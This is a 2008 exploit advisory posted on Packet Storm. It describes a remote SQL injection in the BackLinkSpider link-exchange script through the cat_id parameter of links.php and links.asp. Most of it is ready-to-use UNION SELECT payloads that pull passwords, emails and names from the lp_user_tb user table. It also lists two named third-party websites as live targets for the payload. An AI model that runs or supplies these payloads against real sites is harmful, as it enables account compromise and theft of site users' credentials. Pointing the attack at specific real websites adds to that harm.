backlinkspider-sql.txt

2008-11-20T00:00:00
ID PACKETSTORM:72126
Type packetstorm
Reporter d3v1l
Modified 2008-11-20T00:00:00

Description

                                        
                                            `[~]-----------------------------------------------------------------------------------------------------------------------------------------------------  
[~]  
[~] BackLinkSpider - Exchange links Script (links.asp?cat_id) and  
(links.php?cat_id) Remote SQL Injection Vulnerability  
[~]  
[~] http://www.backlinkspider.com  
[~]  
[~]  
[~]  
----------------------------------------------------------------------------------------------------------------------------------------------------  
[~] Bug founded by d3v1l [Avram Marius]  
[~]  
[~] Date: 20.11.2008  
[~]  
[~]  
[~] d3v1l@spoofer.com http://security-sh3ll.com  
[~]  
[~]  
----------------------------------------------------------------------------------------------------------------------------------------------------  
[~] Greetz tO ALL:-  
[~]  
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )  
[~]  
[~] milw0rm <-> packetstorm Staff  
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------  
[~] Exploit :-  
[~]  
[~] http://site.com/links.php?cat_id=-1 UNION SELECT  
1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20  
from lp_user_tb--  
[~] -1 UNION SELECT  
1,2,3,4,5,6,concat(fname,0x3a,password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20  
from lp_user_tb--  
[~]  
[~]------------------------------------------------------------------------------------------------------------------------------------------------------  
[~]  
[~] Example :-  
[~]  
[~] links.asp?cat_id= ->  
http://www.champagneandchocolates.com/links.asp?cat_id=SQL  
[~]  
[~]  
[~] links.php?cat_id= -> http://www.quad-center.it/links.php?cat_id==SQL  
[~]  
[~]  
[~]-------------------------------------------------------------------------------------------------------------------------------------------------------  
`